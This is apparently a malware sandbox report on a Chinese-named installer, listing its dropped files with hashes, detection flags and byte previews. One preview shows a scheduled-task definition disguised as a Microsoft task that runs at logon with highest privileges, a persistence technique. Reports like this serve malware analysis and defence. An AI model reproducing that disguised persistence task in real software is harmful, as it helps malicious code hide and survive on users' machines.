Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: data
Category: dropped
Size (bytes): 249984
Entropy (8bit): 7.999225319458047
Encrypted: true
SSDEEP: 6144:9kdN1LFIJMjnJSkbZjcFs3hSU16LWlIHO+SgwcyyGYJ4:q1LFIejnJ7bZwY6LWwO+xby+S
MD5: A64035088C56F185A72562787F46C65F
SHA1: 4F74D232C77E47AC1530157078AC3F010A5BE814
SHA-256: BA48ABC7A735A5C78CA4F103C9F7BC8DD65F9D08622B1AA0F8F2D32B64E7E93A
SHA-512: C532C5BA86285B52015A38303377FE17BBC279224F718EE329BBD39DC424269338CC712809432FBB2B785C97797A3991F1548413953592E7AC1D1BD8594A31F1
Malicious: false
                              Preview:.@S....%....,..............[E.J......W(b.7.N...gFd/...m ..H\..q..e.....G....>.*..`DAt...4W.....O......uj..Gm..R.'..P<W......o.u..{`,..5..F........T..d.<........o...'....R.M...a......Jdp....n....*}|x.6.....5..P<.7.v...F...J..8.....[..@E..-..m*.I.T.....J.:........(....nD....Xg.h..........-}`...k...$.~M.....)..o.].{..B..Rg...j.....Z.O....T.t)\.....Re=.U..Q.>...=....Z..6}p.....A..*CF..g..^.x.W..Nx9.`......9*.....e...X..>...7..<?......2...r.b.-..j.R.7.-.....XC..." ...!....U.UFfw...zlH....BLq....c".Z..V..+.&....b..%.z.W.b..v.s.0E..C.:k0..~..&..o....X....<..K".3:....,...oe....L.....4..j..3r.h<#..00.....Jr..../.HZi.u...e.{=.8..(,..}A.$L..........b...c..d..J..i.Q.4.8.....hX.<oL.-832.L|}Yw...Rt.V.}.&..F........'......l....Y.O.. ..c.&....;.@........(V...1........0..4....J.O.........*B......l..)Z...O.V....w.k.|m....9..xz+3.a...j.g<t..d2.f0.j..#y..P[.}.....{....km.vf,.{....;...c........3$.As.....l...:..%..4.3....h..N..*.........R....C^>t..lH.....
Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 5649408
Entropy (8bit): 6.392614480390128
Encrypted: false
SSDEEP: 98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
MD5: 8C71B86BF407C05BAF11E8D296B9C8B8
SHA1: 6624AB8CA883C48F02C58250D4EEE9E90098F4E4
SHA-256: BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
SHA-512: BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
• Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996777007999937
Encrypted: true
SSDEEP: 1536:3DbuN+GJMhUDzY3H8ciDYfgCK5X9Ide3hUXpCSu1+MfQO22:n2jMhozKH8vxtz3hakSYKV2
MD5: 21277A248DF0E02C5F19F6CE5D521AA7
SHA1: 035E6CD46BD766745BE5AB7089ECCDC97DD8943A
SHA-256: F1F20D52717F38F69963E54A4C4F260232085481AE798D8AEC6568514E14CD25
SHA-512: D487B5FF112ECFA7AB22B63488626AFE0AFFD6334C1A6874AA279A9EF4D5DD9A3EED11126FAC6FFC4A36F1EBC71F0B0C04A9DA0CBCE78BD519D59149D9B9E707
Malicious: false
                              Preview:.@S........l ................@[..h.;...j.....A9.V...\dZ.n.-.Z.O.z.j.M.....^K.>".;...m...;.H).@...#"K....I.OD...j...r...e. 3.....!.m.....Bd@7.|^7.5lJ._0....I..%Y0.5~...3..'..B.$.F..[.]z......9... .~.H..t}..I...F.#=.*.D..J...x......O'..=.HU.z..n.. k.-T&..<|.E1OGb2H.C..#LS..*'....6....#x....xM.J.H0..{..i.p..!.......6..N.w.CO.'+..6xK.a%.:.....X.A..\JW..}....u.#......."0t...g+a|..GZ.R........yDf9J....Tf..!)l|......1u@.V.o.|I...l...8a..+D<7.9.....@.e..S].t#..Q...{..g..2...P.......%.....C...w..V..`.m.w.S.a}.bx...V.,.....a..CnS)....v.I. ).a.N...}.]Q.W.T.3..*....G..X....Ki..^..q...;..rs.z:...lw...IN.V|....Q...>M9..9.d.....w._.E.}.CQ...}..9.9.....w.U.Z...j......6qi.e].9O?N.5..N.\7m@..R........m._......`...tr...L...t.Q7...U=..{./.B.....,&.\"@=..Tw..u..r.S.R2.R.R...G..?.u..A.......6kZ..a..o....5.@.a....=.|JaM.1.WQ...I.L./..g..\.#...ZENrz..,...@w$.A..a..5..3?.sr..L.W..~g.....7....s........i0i....,/....9..EUT....&...u.e.m.......82n.. ;...x.p..
Process: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
File Type: 7-zip archive data, version 0.4
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996777007999922
Encrypted: true
SSDEEP: 768:L6bKOYcy4jS9yw4oUsfgv+8jlHhJfjqYiyS28kOPyEMtLqDdRGkcz3em7QSrB4HU:ObKH74wyw4ozf+5hjqZWx/uXKz3dEHYL
MD5: B5AD685CF42B8BB1B42D0B527BE51424
SHA1: 8A064DCF6460DD874433DB2522D538944A509537
SHA-256: B1DCBB750AD95EFCAA8A1C03E0F8C8CEE95776ACDBAF21BBD6B37D19DCA7EFB9
SHA-512: 46BD15FF8BB3FE2301DE5B10799BF5CF9550D0F3DC83CDEFC57D24A46FD9475271CC548AB705E50B93A07C17ADEDF19EA0E468100058DF894D193A249B7AFB84
Malicious: false
                              Preview:7z..'..."0 .........2.......`\.....y.x.;.d..+l.Z..N.,b(1...3.6.....;.t.o.f.sX\..-.....rR.Sf[....Z........l?f.W..x..........^..L|.w.R....3&Xys.............EF..1v...h...F...'k..*@....Y.m.......Yd4..,A.....g..1.. !.A.4.}..$..h..#I+.....Dx.....^....Z..Vl.B...:B.. .......(....O...+.A... .~.z.. ..6H.1u...Z/.(!W.V.%..D..."n.^.#<...D..;..P?.......&..f3....?....c.|.'.Z.as1..93...|G...XJ..A.b.G..2k.8M....m...T..f+.....EU.2........Be..P=j.Mf.....>I\..M.7V.`....@6.*F.9..Gz/..j.A{p..\.D.5y...O.. .v+...`.]n.....6.}......].,.x....g.......iQ...@....R./w.l"..l....o.q.5c9.Tdd?.%Yk.b.. ...?.....*...~g<..w.....Z..'....R..).s.U)...rC...zj'JW....l.2M....y.2.^..p.{v<i...E.s,.Rar...V..."..^.hz.s...tY...>j.y.]...7..d.....;..0.B.N ..1...p...)g..O.U..oF.[..9R... ?Z...L.8..F.#....8M..B..2..\.N .v.Ku.Xe..Vm..o.b..2.a.A.OM.../.......\..tI..&...0eh.uQ.A.jIY......-.bH..`...._@.@&..s..t......du...Av..em.>._Z..3m...O.W..R]ub..o.Ew.,2.....G.....4.).@./Zm.i.X.E..(+....5Q.g.q*
Process: C:\Program Files (x86)\Windows NT\7zr.exe
File Type: data
Category: dropped
Size (bytes): 56546
Entropy (8bit): 7.996966859255975
Encrypted: true
SSDEEP: 1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
MD5: CEA69F993E1CE0FB945A98BF37A66546
SHA1: 7114365265F041DA904574D1F5876544506F89BA
SHA-256: E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
SHA-512: 4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
Malicious: false
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255979
                              Encrypted:true
                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                              MD5:4CB8B7E557C80FC7B014133AB834A042
                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                              Malicious:false
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                              MD5:8622FC7228777F64A47BD6C61478ADD9
                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                              Malicious:false
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.99759370165655
                              Encrypted:true
                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                              MD5:950338D50B95A25F494EE74E97B7B7A9
                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.997593701656546
                              Encrypted:true
                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                              Malicious:false
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653607
                              Encrypted:true
                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653608
                              Encrypted:true
                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999225319458047
                              Encrypted:true
                              SSDEEP:6144:UiZojLOtJtSMEo8gctOJw+51/DrWJEwcTvHPh4c+i2:UiG8+ME1gOO2+51/XWJDKvv2
                              MD5:4100B1A02960442D62C2A71859DE711C
                              SHA1:892354E9BF923DF486A24F3E6AF4F43D66915F98
                              SHA-256:11F926A0E453E3D5FF5D01BB29EF2C9A46CA30AB367D03210E0794D2C7616FF7
                              SHA-512:42632F833ABB0E3C0A647BE83C6C22135D1590B64AC3DE3006B1CF9D689BEDE54668A396067A2CE5AFAA900E3DD874F1899F390C133C22CC5464665766F21AAE
                              Malicious:false
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):63640
                              Entropy (8bit):6.482810107683822
                              Encrypted:false
                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 9%
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.344834847024567
                              Encrypted:false
                              SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                              MD5:7F252B19B6E96247184F55570325E9FA
                              SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                              SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                              SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                              Malicious:false
                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulVmdtZ:NllUM
                              MD5:013016A37665E1E37F0A3576A8EC8324
                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                              Malicious:false
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                              Process:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3366912
                              Entropy (8bit):6.530548291878271
                              Encrypted:false
                              SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                              MD5:9902FA6D39184B87AED7D94A037912D8
                              SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                              SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                              SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                              Malicious:true
